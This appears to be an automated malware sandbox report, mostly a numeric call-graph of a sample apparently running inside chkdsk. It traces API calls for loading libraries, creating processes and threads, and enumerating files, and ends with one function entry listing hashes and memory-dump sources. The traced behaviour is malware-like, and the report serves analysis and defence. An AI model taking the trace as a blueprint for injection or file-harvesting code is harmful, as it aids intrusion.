81853->81799 81853->81800 81855 8881dc 81854->81855 81856 8891e0 LdrLoadDll 81854->81856 81855->81849 81856->81855 81858 88821c 81857->81858 81859 8891e0 LdrLoadDll 81857->81859 81862 54634e0 LdrInitializeThunk 81858->81862 81859->81858 81860 87d144 81860->81852 81862->81860 81864 87b747 81863->81864 81872 87d470 81864->81872 81868 87b7bb 81869 87b7c2 81868->81869 81883 888520 LdrLoadDll 81868->81883 81869->81822 81871 87b7d5 81871->81822 81873 87d495 81872->81873 81884 877120 81873->81884 81875 87b78f 81880 888960 81875->81880 81876 883a50 8 API calls 81878 87d4b9 81876->81878 81878->81875 81878->81876 81879 88a0a0 2 API calls 81878->81879 81891 87d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 81878->81891 81879->81878 81881 88897f CreateProcessInternalW 81880->81881 81882 8891e0 LdrLoadDll 81880->81882 81881->81868 81882->81881 81883->81871 81885 87721f 81884->81885 81886 877135 81884->81886 81885->81878 81886->81885 81887 883a50 8 API calls 81886->81887 81888 8771a2 81887->81888 81889 88a0a0 2 API calls 81888->81889 81890 8771c9 81888->81890 81889->81890 81890->81878 81891->81878 81893 883e50 LdrLoadDll 81892->81893 81894 87d44f 81893->81894 81895 87d456 SetErrorMode 81894->81895 81896 87d45d 81894->81896 81895->81896 81896->81825 81899 8833c6 81897->81899 81975 87d200 81897->81975 81899->81827 81901 88a020 2 API calls 81900->81901 81904 877a45 81900->81904 81901->81904 81902 877c5a 81902->81830 81904->81902 81994 887b00 81904->81994 81906 87ac1f 81905->81906 81907 87ac19 81905->81907 82051 878620 81906->82051 82042 87ccc0 81907->82042 81910 87ac2c 81911 88b380 3 API calls 81910->81911 81954 87aeb8 81910->81954 81912 87ac48 81911->81912 81913 87ac5c 81912->81913 81914 87d3d0 2 API calls 81912->81914 82060 887f90 81913->82060 81914->81913 81917 87ad86 82077 87aba0 LdrLoadDll LdrInitializeThunk 81917->82077 81918 888180 2 API calls 81919 87acda 81918->81919 81919->81917 81925 87ace6 81919->81925 81921 87ada5 81922 87adad 81921->81922 82078 87ab10 LdrLoadDll NtClose LdrInitializeThunk 81921->82078 81923 888710 2 API calls 81922->81923 81927 87adb7 81923->81927 81926 888290 2 API calls 81925->81926 81933 87ad2f 81925->81933 81925->81954 81926->81933 81927->81837 81928 888710 2 API calls 81930 87ad4c 81928->81930 81929 87adcf 81929->81922 81931 87add6 81929->81931 82064 8875b0 81930->82064 81937 87adee 81931->81937 82079 87aa90 81931->82079 81933->81928 81934 87ad63 81934->81954 82067 877280 81934->82067 82082 888010 LdrLoadDll 81937->82082 81938 87ae02 82083 87a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81938->82083 81942 87ae26 81943 87ae73 81942->81943 82084 888040 LdrLoadDll 81942->82084 82086 8880a0 LdrLoadDll 81943->82086 81946 87ae44 81946->81943 82085 8880d0 LdrLoadDll 81946->82085 81947 87ae81 81948 888710 2 API calls 81947->81948 81949 87ae8b 81948->81949 81951 888710 2 API calls 81949->81951 81952 87ae95 81951->81952 81953 877280 3 API calls 81952->81953 81952->81954 81953->81954 81954->81837 81956 87d3e3 81955->81956 82158 888110 81956->82158 81960 87cec0 81959->81960 81961 87cef8 81959->81961 81960->81961 81970 87ceef 81960->81970 82165 87bd30 81960->82165 81967 87cf13 81961->81967 81974 87cf48 81961->81974 82220 87cc60 11 API calls 81961->82220 82198 87cbe0 81967->82198 81969 87cf57 81969->81837 82180 87cd10 81970->82180 81973 883a50 8 API calls 81973->81974 82221 874360 27 API calls 81974->82221 81976 87d21d 81975->81976 81982 888240 81976->81982 81979 87d265 81979->81899 81983 88825c 81982->81983 81984 8891e0 LdrLoadDll 81982->81984 81992 5462e50 LdrInitializeThunk 81983->81992 81984->81983 81985 87d25e 81985->81979 81987 888290 81985->81987 81988 8891e0 LdrLoadDll 81987->81988 81989 8882ac 81988->81989 81993 5462c30 LdrInitializeThunk 81989->81993 81990 87d28e 81990->81899 81992->81985 81993->81990 81995 88a270 2 API calls 81994->81995 81996 887b17 81995->81996 82015 878160 81996->82015 81998 887b32 81999 887b59 81998->81999 82000 887b70 81998->82000 82001 88a0a0 2 API calls 81999->82001 82003 88a020 2 API calls 82000->82003 82002 887b66 82001->82002 82002->81902 82004 887baa 82003->82004 82005 88a020 2 API calls 82004->82005 82007 887bc3 82005->82007 82012 887e64 82007->82012 82021 88a060 LdrLoadDll 82007->82021 82008 887e49 82009 887e50 82008->82009 82008->82012 82010 88a0a0 2 API calls 82009->82010 82011 887e5a 82010->82011 82011->81902 82013 88a0a0 2 API calls 82012->82013 82014 887eb9 82013->82014 82014->81902 82016 878185 82015->82016 82017 879b40 LdrLoadDll 82016->82017 82018 8781b8 82017->82018 82020 8781dd 82018->82020 82022 87b340 82018->82022 82020->81998 82021->82008 82023 87b36c 82022->82023 82024 888460 LdrLoadDll 82023->82024 82025 87b385 82024->82025 82026 87b38c 82025->82026 82033 8884a0 82025->82033 82026->82020 82030 87b3c7 82031 888710 2 API calls 82030->82031 82032 87b3ea 82031->82032 82032->82020 82034 8891e0 LdrLoadDll 82033->82034 82035 8884bc 82034->82035 82041 5462bc0 LdrInitializeThunk 82035->82041 82036 87b3af 82036->82026 82038 888a90 82036->82038 82039 888aaf 82038->82039 82040 8891e0 LdrLoadDll 82038->82040 82039->82030 82040->82039 82041->82036 82087 87bdb0 82042->82087 82044 87ccd7 82050 87ccf0 82044->82050 82100 873d70 82044->82100 82045 88a270 2 API calls 82047 87ccfe 82045->82047 82047->81906 82048 87ccea 82124 887430 82048->82124 82050->82045 82053 87863b 82051->82053 82052 87875b 82052->81910 82053->82052 82054 87d080 3 API calls 82053->82054 82055 87873c 82054->82055 82056 87876a 82055->82056 82057 878751 82055->82057 82058 888710 2 API calls 82055->82058 82056->81910 82157 875ea0 LdrLoadDll 82057->82157 82058->82057 82061 887f9c 82060->82061 82062 8891e0 LdrLoadDll 82061->82062 82063 87acb0 82062->82063 82063->81917 82063->81918 82063->81954 82065 87d3d0 2 API calls 82064->82065 82066 8875e2 82064->82066 82065->82066 82066->81934 82068 877298 82067->82068 82069 879b40 LdrLoadDll 82068->82069 82070 8772b3 82069->82070 82071 883e50 LdrLoadDll 82070->82071 82072 8772c3 82071->82072 82073 8772fd 82072->82073 82074 8772cc PostThreadMessageW 82072->82074 82073->81837 82074->82073 82075 8772e0 82074->82075 82076 8772ea PostThreadMessageW 82075->82076 82076->82073 82077->81921 82078->81929 82080 888290 2 API calls 82079->82080 82081 87aace 82080->82081 82081->81937 82082->81938 82083->81942 82084->81946 82085->81943 82086->81947 82088 87bde3 82087->82088 82129 87a150 82088->82129 82090 87bdf5 82133 87a2c0 82090->82133 82092 87be13 82093 87a2c0 LdrLoadDll 82092->82093 82094 87be29 82093->82094 82095 87d200 3 API calls 82094->82095 82096 87be4d 82095->82096 82097 87be54 82096->82097 82136 88a2b0 LdrLoadDll RtlAllocateHeap 82096->82136 82097->82044 82099 87be64 82099->82044 82101 873d96 82100->82101 82102 87b340 3 API calls 82101->82102 82104 873e61 82102->82104 82103 873e68 82103->82048 82104->82103 82137 88a2f0 82104->82137 82106 873ec9 82107 879e90 LdrLoadDll 82106->82107 82108 873fd3 82107->82108 82109 879e90 LdrLoadDll 82108->82109 82110 873ff7 82109->82110 82141 87b400 82110->82141 82114 874083 82115 88a020 2 API calls 82114->82115 82116 874110 82115->82116 82117 88a020 2 API calls 82116->82117 82119 87412a 82117->82119 82118 8742a6 82118->82048 82119->82118 82120 879e90 LdrLoadDll 82119->82120 82121 87416a 82120->82121 82122 879d60 LdrLoadDll 82121->82122 82123 87420a 82122->82123 82123->82048 82125 883e50 LdrLoadDll 82124->82125 82127 887451 82125->82127 82126 887477 82126->82050 82127->82126 82128 887464 CreateThread 82127->82128 82128->82050 82130 87a177 82129->82130 82131 879e90 LdrLoadDll 82130->82131 82132 87a1b3 82131->82132 82132->82090 82134 879e90 LdrLoadDll 82133->82134 82135 87a2d9 82133->82135 82134->82135 82135->82092 82136->82099 82138 88a2fd 82137->82138 82139 883e50 LdrLoadDll 82138->82139 82140 88a310 82139->82140 82140->82106 82142 87b425 82141->82142 82150 888310 82142->82150 82145 8883a0 82146 8891e0 LdrLoadDll 82145->82146 82147 8883bc 82146->82147 82156 5462b00 LdrInitializeThunk 82147->82156 82148 8883db 82148->82114 82151 8891e0 LdrLoadDll 82150->82151 82152 88832c 82151->82152 82155 5462b80 LdrInitializeThunk 82152->82155 82153 87405c 82153->82114 82153->82145 82155->82153 82156->82148 82157->82052 82159 888117 82158->82159 82160 8891e0 LdrLoadDll 82159->82160 82161 88812c 82160->82161 82164 5462cf0 LdrInitializeThunk 82161->82164 82162 87d40e 82162->81837 82164->82162 82166 87bda5 82165->82166 82167 87bd40 82165->82167 82166->81970 82167->82166 82222 87d010 82167->82222 82169 87bd50 82170 883a50 8 API calls 82169->82170 82171 87bd61 82170->82171 82172 883a50 8 API calls 82171->82172 82173 87bd6c 82172->82173 82174 87bd7a 82173->82174 82230 87b7f0 82173->82230 82176 883a50 8 API calls 82174->82176 82177 87bd88 82176->82177 82178 883a50 8 API calls 82177->82178 82179 87bd93 82178->82179 82179->81970 82181 87cd40 82180->82181 82281 882d60 82181->82281 82183 87cd81 82319 881a50 82183->82319 82185 87cd87 82355 87ed00 82185->82355 82187 87cd8d 82378 880bd0 82187->82378 82189 87cd95 82410 881d70 82189->82410 82193 87cda1 82444 8823e0 82193->82444 82195 87cda7 82470 87d720 82195->82470 82199 87cbf8 82198->82199 82203 87cc49 82198->82203 82200 87db00 8 API calls 82199->82200 82199->82203 82201 87cc33 82200->82201 82201->82203 82656 87dd50 82201->82656 82203->81969 82204 87ca20 82203->82204 82205 87ca3c 82204->82205 82209 87cb1b 82204->82209 82206 888710 2 API calls 82205->82206 82205->82209 82210 87ca57 82206->82210 82207 87cbce 82207->81973 82207->81974 82208 883a50 8 API calls 82208->82207 82217 87cbb1 82209->82217 82713 87b570 82209->82713 82213 87b570 4 API calls 82210->82213 82212 87cb8b 82215 87b7f0 5 API calls 82212->82215 82212->82217 82214 87ca8f 82213->82214 82216 879e90 LdrLoadDll 82214->82216 82215->82217 82218 87caa0 82216->82218 82217->82207 82217->82208 82219 879e90 LdrLoadDll 82218->82219 82219->82209 82220->81967 82221->81969 82223 87d037 82222->82223 82224 888460 LdrLoadDll 82222->82224 82225 87d03e 82223->82225 82226 8884a0 2 API calls 82223->82226 82224->82223 82225->82169 82227 87d05c 82226->82227 82228 888710 2 API calls 82227->82228 82229 87d068 82228->82229 82229->82169 82231 87b815 82230->82231 82232 87b837 82231->82232 82233 87b823 82231->82233 82234 879e90 LdrLoadDll 82232->82234 82235 879e90 LdrLoadDll 82233->82235 82236 87b846 82234->82236 82237 87b832 82235->82237 82239 87b340 3 API calls 82236->82239 82238 879e90 LdrLoadDll 82237->82238 82240 87ba34 82237->82240 82241 87b8a6 82238->82241 82239->82237 82240->82174 82242 879e90 LdrLoadDll 82241->82242 82243 87b8d7 82242->82243 82244 87b9d0 82243->82244 82246 87b400 2 API calls 82243->82246 82245 87b400 2 API calls 82244->82245 82247 87b9e9 82245->82247 82248 87b8fa 82246->82248 82271 87b4b0 82247->82271 82250 87b905 82248->82250 82251 87b9af 82248->82251 82252 888710 2 API calls 82250->82252 82255 879e90 LdrLoadDll 82251->82255 82253 87b90f 82252->82253 82257 879e90 LdrLoadDll 82253->82257 82254 888710 2 API calls 82254->82240 82255->82244 82256 87b9f9 82256->82254 82258 87b933 82257->82258 82259 87b400 2 API calls 82258->82259 82260 87b949 82259->82260 82261 888710 2 API calls 82260->82261 82262 87b953 82261->82262 82263 879e90 LdrLoadDll 82262->82263 82264 87b977 82263->82264 82265 87b400 2 API calls 82264->82265 82266 87b98d 82265->82266 82267 87b4b0 2 API calls 82266->82267 82268 87b99d 82267->82268 82269 888710 2 API calls 82268->82269 82270 87b9a7 82269->82270 82270->82174 82272 87b4d4 82271->82272 82275 888360 82272->82275 82276 88837c 82275->82276 82277 8891e0 LdrLoadDll 82275->82277 82280 5462fb0 LdrInitializeThunk 82276->82280 82277->82276 82278 87b55b 82278->82256 82280->82278 82282 882d88 82281->82282 82283 879e90 LdrLoadDll 82282->82283 82284 882db7 82283->82284 82285 87b340 3 API calls 82284->82285 82287 882dea 82285->82287 82286 882df1 82286->82183 82287->82286 82288 879e90 LdrLoadDll 82287->82288 82289 882e19 82288->82289 82290 879e90 LdrLoadDll 82289->82290 82291 882e3d 82290->82291 82292 87b400 2 API calls 82291->82292 82293 882e61 82292->82293 82294 882ea3 82293->82294 82482 8826c0 82293->82482 82298 879e90 LdrLoadDll 82294->82298 82296 882e7a 82297 883026 82296->82297 82486 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82296->82486 82297->82183 82300 882ec3 82298->82300 82301 87b400 2 API calls 82300->82301 82302 882ee7 82301->82302 82303 882f2d 82302->82303 82304 882f04 82302->82304 82306 8826c0 8 API calls 82302->82306 82305 87b400 2 API calls 82303->82305 82304->82297 82487 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82304->82487 82308 882f5d 82305->82308 82306->82304 82309 882fa3 82308->82309 82310 882f7a 82308->82310 82312 8826c0 8 API calls 82308->82312 82313 87b400 2 API calls 82309->82313 82310->82297 82488 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82310->82488 82312->82310 82314 883002 82313->82314 82315 88304b 82314->82315 82316 88301f 82314->82316 82317 8826c0 8 API calls 82314->82317 82315->82183 82316->82297 82489 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82316->82489 82317->82316 82320 881ab4 82319->82320 82321 879e90 LdrLoadDll 82320->82321 82322 881b81 82321->82322 82323 87b340 3 API calls 82322->82323 82325 881bb4 82323->82325 82324 881bbb 82324->82185 82325->82324 82326 879e90 LdrLoadDll 82325->82326 82327 881be3 82326->82327 82328 87b400 2 API calls 82327->82328 82329 881c23 82328->82329 82330 8826c0 8 API calls 82329->82330 82353 881d43 82329->82353 82331 881c40 82330->82331 82332 881d52 82331->82332 82490 881870 82331->82490 82333 888710 2 API calls 82332->82333 82335 881d5c 82333->82335 82335->82185 82336 881c58 82336->82332 82337 881c63 82336->82337 82338 88a270 2 API calls 82337->82338 82339 881c8c 82338->82339 82340 881cab 82339->82340 82341 881c95 82339->82341 82519 881760 CoInitialize 82340->82519 82343 888710 2 API calls 82341->82343 82345 881c9f 82343->82345 82344 881cb9 82521 888420 82344->82521 82345->82185 82347 881d32 82348 888710 2 API calls 82347->82348 82350 881d3c 82348->82350 82351 88a0a0 2 API calls 82350->82351 82351->82353 82352 881cd7 82352->82347 82354 888420 2 API calls 82352->82354 82526 881690 LdrLoadDll RtlFreeHeap 82352->82526 82353->82185 82354->82352 82356 87ed28 82355->82356 82357 88a270 2 API calls 82356->82357 82359 87ed88 82357->82359 82358 87ed91 82358->82187 82359->82358 82528 87e9c0 82359->82528 82361 87edb8 82363 87edd6 82361->82363 82563 8807c0 11 API calls 82361->82563 82367 87edf0 82363->82367 82565 879c90 LdrLoadDll 82363->82565 82364 87edca 82564 8807c0 11 API calls 82364->82564 82368 87e9c0 10 API calls 82367->82368 82369 87ee1b 82368->82369 82370 87ee3a 82369->82370 82566 8807c0 11 API calls 82369->82566 82372 87ee54 82370->82372 82568 879c90 LdrLoadDll 82370->82568 82375 88a0a0 2 API calls 82372->82375 82373 87ee2e 82567 8807c0 11 API calls 82373->82567 82377 87ee5e 82375->82377 82377->82187 82379 880bf6 82378->82379 82380 880c08 82379->82380 82381 880c8e 82379->82381 82382 879e90 LdrLoadDll 82380->82382 82386 880c6c 82381->82386 82584 881d90 82381->82584 82383 880c19 82382->82383 82387 880c37 82383->82387 82390 879e90 LdrLoadDll 82383->82390 82389 880c86 82386->82389 82589 886b60 82386->82589 82391 879e90 LdrLoadDll 82387->82391 82388 880ccb 82393 880cea 82388->82393 82394 880d2c 82388->82394 82403 880d20 82388->82403 82389->82189 82390->82387 82392 880c5b 82391->82392 82396 883a50 8 API calls 82392->82396 82397 880d0f 82393->82397 82398 880cf2 82393->82398 82395 879e90 LdrLoadDll 82394->82395 82399 880d3d 82395->82399 82396->82386 82401 88a0a0 2 API calls 82397->82401 82400 88a0a0 2 API calls 82398->82400 82615 880000 82399->82615 82402 880d03 82400->82402 82401->82403 82402->82189 82403->82189 82405 880e3f 82406 88a0a0 2 API calls 82405->82406 82407 880e46 82406->82407 82407->82189 82408 880d57 82408->82405 82621 8806f0 9 API calls 82408->82621 82411 880bd0 11 API calls 82410->82411 82412 87cd9b 82411->82412 82413 87fbc0 82412->82413 82414 87fbe2 82413->82414 82415 879e90 LdrLoadDll 82414->82415 82416 87fdad 82415->82416 82417 879e90 LdrLoadDll 82416->82417 82418 87fdbe 82417->82418 82419 879d60 LdrLoadDll 82418->82419 82420 87fdd5 82419->82420 82623 87fa90 82420->82623 82423 87fa90 11 API calls 82424 87fe4b 82423->82424 82425 87fa90 11 API calls 82424->82425 82426 87fe63 82425->82426 82427 87fa90 11 API calls 82426->82427 82428 87fe7b 82427->82428 82429 87fa90 11 API calls 82428->82429 82430 87fe93 82429->82430 82431 87fa90 11 API calls 82430->82431 82432 87feae 82431->82432 82433 87fec8 82432->82433 82434 87fa90 11 API calls 82432->82434 82433->82193 82435 87fefc 82434->82435 82436 87fa90 11 API calls 82435->82436 82437 87ff39 82436->82437 82438 87fa90 11 API calls 82437->82438 82439 87ff76 82438->82439 82440 87fa90 11 API calls 82439->82440 82441 87ffb3 82440->82441 82442 87fa90 11 API calls 82441->82442 82443 87fff0 82442->82443 82443->82193 82445 8823fd 82444->82445 82446 879b40 LdrLoadDll 82445->82446 82447 882418 82446->82447 82448 883e50 LdrLoadDll 82447->82448 82467 8825e6 82447->82467 82449 882442 82448->82449 82450 883e50 LdrLoadDll 82449->82450 82451 882455 82450->82451 82452 883e50 LdrLoadDll 82451->82452 82453 882468 82452->82453 82454 883e50 LdrLoadDll 82453->82454 82455 88247b 82454->82455 82456 883e50 LdrLoadDll 82455->82456 82457 882491 82456->82457 82458 883e50 LdrLoadDll 82457->82458 82459 8824a4 82458->82459 82460 883e50 LdrLoadDll 82459->82460 82461 8824b7 82460->82461 82462 883e50 LdrLoadDll 82461->82462 82463 8824ca 82462->82463 82464 883e50 LdrLoadDll 82463->82464 82465 8824df 82464->82465 82466 8826c0 8 API calls 82465->82466 82465->82467 82469 882561 82466->82469 82467->82195 82469->82467 82638 881fa0 LdrLoadDll 82469->82638 82471 87d783 82470->82471 82639 880130 82471->82639 82473 87d7e4 82475 881d90 8 API calls 82473->82475 82474 87d7a6 82474->82473 82648 87d5d0 82474->82648 82477 87d807 82475->82477 82478 87d5d0 8 API calls 82477->82478 82479 87d845 82477->82479 82478->82479 82480 87d5d0 8 API calls 82479->82480 82481 87cdcb 82480->82481 82481->81961 82483 88273d 82482->82483 82484 883a50 8 API calls 82483->82484 82485 8828b9 82483->82485 82484->82485 82485->82296 82486->82294 82487->82303 82488->82309 82489->82315 82491 88188c 82490->82491 82492 879b40 LdrLoadDll 82491->82492 82493 8818a7 82492->82493 82494 8818b0 82493->82494 82495 883e50 LdrLoadDll 82493->82495 82494->82336 82496 8818c7 82495->82496 82497 883e50 LdrLoadDll 82496->82497 82498 8818dc 82497->82498 82499 883e50 LdrLoadDll 82498->82499 82500 8818ef 82499->82500 82501 883e50 LdrLoadDll 82500->82501 82502 881902 82501->82502 82503 883e50 LdrLoadDll 82502->82503 82504 881918 82503->82504 82505 883e50 LdrLoadDll 82504->82505 82506 88192b 82505->82506 82507 879b40 LdrLoadDll 82506->82507 82508 881954 82507->82508 82509 883e50 LdrLoadDll 82508->82509 82518 8819f0 82508->82518 82510 881978 82509->82510 82511 879b40 LdrLoadDll 82510->82511 82512 8819ad 82511->82512 82513 883e50 LdrLoadDll 82512->82513 82512->82518 82514 8819ca 82513->82514 82515 883e50 LdrLoadDll 82514->82515 82516 8819dd 82515->82516 82517 883e50 LdrLoadDll 82516->82517 82517->82518 82518->82336 82520 8817c5 82519->82520 82520->82344 82522 8891e0 LdrLoadDll 82521->82522 82523 88843c 82522->82523 82527 5462ac0 LdrInitializeThunk 82523->82527 82524 88845b 82524->82352 82526->82352 82527->82524 82529 87ea58 82528->82529 82530 879e90 LdrLoadDll 82529->82530 82531 87eaf6 82530->82531 82532 879e90 LdrLoadDll 82531->82532 82533 87eb11 82532->82533 82534 87b400 2 API calls 82533->82534 82535 87eb36 82534->82535 82536 87ecae 82535->82536 82538 8883a0 2 API calls 82535->82538 82537 87ecbf 82536->82537 82569 87db00 82536->82569 82537->82361 82540 87eb61 82538->82540 82541 87eca4 82540->82541 82543 87eb6c 82540->82543 82542 888710 2 API calls 82541->82542 82542->82536 82544 888710 2 API calls 82543->82544 82545 87ebaf 82544->82545 82581 88a340 LdrLoadDll 82545->82581 82547 87ebe8 82548 87ebef 82547->82548 82549 87b400 2 API calls 82547->82549 82548->82361 82550 87ec13 82549->82550 82550->82537 82551 8883a0 2 API calls 82550->82551 82552 87ec38 82551->82552 82553 87ec3f 82552->82553 82554 87ec8b 82552->82554 82555 888710 2 API calls 82553->82555 82556 888710 2 API calls 82554->82556 82557 87ec49 82555->82557 82558 87ec95 82556->82558 82582 87e130 LdrLoadDll 82557->82582 82558->82361 82560 87ec66 82560->82537 82583 87e740 8 API calls 82560->82583 82562 87ec7c 82562->82361 82563->82364 82564->82363 82565->82367 82566->82373 82567->82370 82568->82372 82570 87db25 82569->82570 82571 879e90 LdrLoadDll 82570->82571 82572 87dbe0 82571->82572 82573 879e90 LdrLoadDll 82572->82573 82574 87dc04 82573->82574 82575 883a50 8 API calls 82574->82575 82577 87dc57 82575->82577 82576 87dd11 82576->82537 82577->82576 82578 879e90 LdrLoadDll 82577->82578 82579 87dcbe 82578->82579 82580 883a50 8 API calls 82579->82580 82580->82576 82581->82547 82582->82560 82583->82562 82585 879e90 LdrLoadDll 82584->82585 82586 881dac 82585->82586 82587 883a50 8 API calls 82586->82587 82588 881e65 82586->82588 82587->82588 82588->82386 82590 886b6e 82589->82590 82591 886b75 82589->82591 82590->82388 82592 879b40 LdrLoadDll 82591->82592 82593 886ba0 82592->82593 82594 88a270 2 API calls 82593->82594 82613 886cf4 82593->82613 82595 886bb8 82594->82595 82595->82613 82622 8801a0 LdrLoadDll 82595->82622 82597 886bd6 82598 883e50 LdrLoadDll 82597->82598 82599 886bec 82598->82599 82600 883e50 LdrLoadDll 82599->82600 82601 886c08 82600->82601 82602 883e50 LdrLoadDll 82601->82602 82603 886c24 82602->82603 82604 883e50 LdrLoadDll 82603->82604 82605 886c43 82604->82605 82606 883e50 LdrLoadDll 82605->82606 82607 886c5f 82606->82607 82608 883e50 LdrLoadDll 82607->82608 82609 886c7b 82608->82609 82610 883e50 LdrLoadDll 82609->82610 82611 886ca1 82610->82611 82612 88a0a0 2 API calls 82611->82612 82614 886ce4 82611->82614 82612->82613 82613->82388 82614->82388 82616 880026 82615->82616 82617 879e90 LdrLoadDll 82616->82617 82618 88005c 82617->82618 82619 87b730 10 API calls 82618->82619 82620 88011f 82619->82620 82620->82408 82621->82408 82622->82597 82624 87fab9 82623->82624 82625 883e50 LdrLoadDll 82624->82625 82626 87faf0 82625->82626 82627 883e50 LdrLoadDll 82626->82627 82628 87fb08 82627->82628 82629 883e50 LdrLoadDll 82628->82629 82631 87fb24 82629->82631 82630 87fbac 82630->82423 82631->82630 82632 87fb4e FindFirstFileW 82631->82632 82632->82630 82636 87fb69 82632->82636 82633 87fb93 FindNextFileW 82635 87fba5 FindClose 82633->82635 82633->82636 82635->82630 82636->82633 82637 87f970 11 API calls 82636->82637 82637->82636 82638->82469 82640 880146 82639->82640 82641 879e90 LdrLoadDll 82639->82641 82642 88015a 82640->82642 82643 879e90 LdrLoadDll 82640->82643 82641->82640 82644 879e90 LdrLoadDll 82642->82644 82643->82642 82645 880174 82644->82645 82646 883a50 8 API calls 82645->82646 82647 880188 82645->82647 82646->82647 82647->82474 82649 87d600 82648->82649 82655 87d715 82648->82655 82650 883a50 8 API calls 82649->82650 82651 87d618 82650->82651 82652 883a50 8 API calls 82651->82652 82651->82655 82653 87d648 82652->82653 82654 88a0a0 2 API calls 82653->82654 82653->82655 82654->82655 82655->82473 82657 87dd75 82656->82657 82658 883e50 LdrLoadDll 82657->82658 82659 87ddc0 82658->82659 82660 87e11f 82659->82660 82661 883a50 8 API calls 82659->82661 82660->82203 82662 87dddc 82661->82662 82662->82660 82663 888960 2 API calls 82662->82663 82664 87de12 82663->82664 82665 87e107 82664->82665 82666 88b380 3 API calls 82664->82666 82667 88a0a0 2 API calls 82665->82667 82668 87de31 82666->82668 82667->82660 82668->82665 82669 87df27 82668->82669 82670 888180 2 API calls 82668->82670 82707 87aba0 LdrLoadDll LdrInitializeThunk 82669->82707 82671 87deb1 82670->82671 82671->82669 82673 87deb9 82671->82673 82675 87df0d 82673->82675 82676 87dedc 82673->82676 82679 87aa90 2 API calls 82673->82679 82674 87df52 82674->82665 82678 87df87 82674->82678 82682 87aa90 2 API calls 82674->82682 82677 88a0a0 2 API calls 82675->82677 82680 888710 2 API calls 82676->82680 82681 87df1d 82677->82681 82708 87a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82678->82708 82679->82676 82684 87deec 82680->82684 82681->82203 82682->82678 82686 8875b0 2 API calls 82684->82686 82685 87dfa9 82687 87dfb7 82685->82687 82688 87e0e6 82685->82688 82686->82675 82709 888780 LdrLoadDll 82687->82709 82690 88a0a0 2 API calls 82688->82690 82691 87e0fd 82690->82691 82691->82203 82692 87dfd6 82693 87d200 3 API calls 82692->82693 82694 87e03b 82693->82694 82694->82665 82695 87e046 82694->82695 82696 88a0a0 2 API calls 82695->82696 82697 87e06a 82696->82697 82710 8882e0 LdrLoadDll 82697->82710 82699 87e07e 82700 888290 2 API calls 82699->82700 82701 87e0a5 82700->82701 82702 87e0ac 82701->82702 82711 8882e0 LdrLoadDll 82701->82711 82702->82203 82704 87e0ce 82712 8880a0 LdrLoadDll 82704->82712 82706 87e0dc 82706->82203 82707->82674 82708->82685 82709->82692 82710->82699 82711->82704 82712->82706 82714 87b59c 82713->82714 82715 87b400 2 API calls 82714->82715 82716 87b5e6 82715->82716 82717 87b688 82716->82717 82718 888420 2 API calls 82716->82718 82717->82212 82721 87b60d 82718->82721 82719 87b67f 82720 888710 2 API calls 82719->82720 82720->82717 82721->82719 82722 888420 2 API calls 82721->82722 82723 87b694 82721->82723 82722->82721 82724 888710 2 API calls 82723->82724 82725 87b69d 82724->82725 82726 87b70c 82725->82726 82727 87b400 2 API calls 82725->82727 82726->82212 82728 87b6b6 82727->82728 82728->82726 82729 883e50 LdrLoadDll 82728->82729 82729->82726 82732 54629f0 LdrInitializeThunk 82734 887300 82735 88a020 2 API calls 82734->82735 82737 88733b 82735->82737 82736 88741c 82737->82736 82738 879b40 LdrLoadDll 82737->82738 82739 887371 82738->82739 82740 883e50 LdrLoadDll 82739->82740 82742 88738d 82740->82742 82741 8873a0 Sleep 82741->82742 82742->82736 82742->82741 82745 886f30 LdrLoadDll 82742->82745 82746 887130 LdrLoadDll 82742->82746 82745->82742 82746->82742

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0087FA89 Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0087FB5F
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0087FB9E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0087FBA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                • Opcode ID: 154f4dd43d8fa96e90b800bd0237c4e333e727612d7a268e1e7915b805a11a03
                                                                                                                                                                                                                                • Instruction ID: f133438fcb10ed49e171669bd50b289d0882f4a68b50824cb347bff84efcaa26
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 154f4dd43d8fa96e90b800bd0237c4e333e727612d7a268e1e7915b805a11a03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE318571500308BBDB21DF65CC85FEB777CFF84714F148559B649E6181D670EA848BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0087FA90 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0087FB5F
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0087FB9E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0087FBA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
